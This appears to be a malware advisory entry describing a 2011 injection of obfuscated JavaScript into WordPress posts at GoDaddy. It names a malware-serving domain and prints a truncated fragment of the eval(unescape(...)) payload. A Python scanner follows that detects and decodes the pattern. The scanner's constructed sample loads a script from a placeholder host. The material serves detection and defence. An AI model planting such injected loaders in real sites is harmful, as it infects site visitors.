Description:
Code used to insert malicious JavaScript into many WordPress sites hosted at GoDaddy. The malicious code is added to the database, infecting every post. It loads the malware from lessthenaminutehandle.com and many other domains.
It generally infects all WordPress posts. More details here: http://blog.sucuri.net/2011/02/hilary-kneber-godaddy-and-welcometotheglobalisnet-com.html
Clean up:
Contact support@sucuri.net.
Malware dump:
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72 %69%7..
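A defender-side check for the injection pattern shown in the dump, added here as an example and not code from the original page: it scans exported post content for `<script>eval(unescape("%XX...` blocks, decodes the payload as text without executing it, and lists the hosts it references. The `(post_id, post_content)` input shape, the function names, and the sample payload with the placeholder host `malware.example` are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlparse

# <script>eval(unescape("%XX%XX...")) as in the dump above; either quote style.
INJECTION_RE = re.compile(
    r"""<script[^>]*>\s*eval\(\s*unescape\(\s*(["'])(?P<payload>[%0-9A-Fa-f\s]+)\1""",
    re.IGNORECASE,
)
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)


def decode_payload(payload):
    """Percent-decode the blob as text only; it is never evaluated.
    Whitespace inside the blob is dropped first. Latin-1 mirrors how
    JavaScript unescape() maps %XX to a single character."""
    return unquote(re.sub(r"\s+", "", payload), encoding="latin-1")


def scan_posts(posts):
    """posts: iterable of (post_id, post_content). Returns one finding per hit."""
    findings = []
    for post_id, content in posts:
        for m in INJECTION_RE.finditer(content):
            decoded = decode_payload(m.group("payload"))
            hosts = {urlparse(u).hostname for u in URL_RE.findall(decoded)}
            findings.append({"post_id": post_id, "decoded": decoded,
                             "hosts": sorted(h for h in hosts if h)})
    return findings


def _encode(js):
    """Build a constructed sample in the same %XX form."""
    return "".join("%%%02X" % b for b in js.encode("latin-1"))


# Constructed sample data: malware.example is a placeholder host.
SAMPLE_JS = 'document.write(\'<script src="http://malware.example/js.php?kk=1"></script>\')'
SAMPLE_POSTS = [
    (1, "<p>A clean post.</p>"),
    (2, '<p>Post body.</p><script>eval(unescape("' + _encode(SAMPLE_JS) + '"))</script>'),
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print(f["post_id"], f["hosts"], f["decoded"])
```

The decoder covers only the `%XX` form visible in the dump; the `%uXXXX` form that `unescape()` also accepts is not matched.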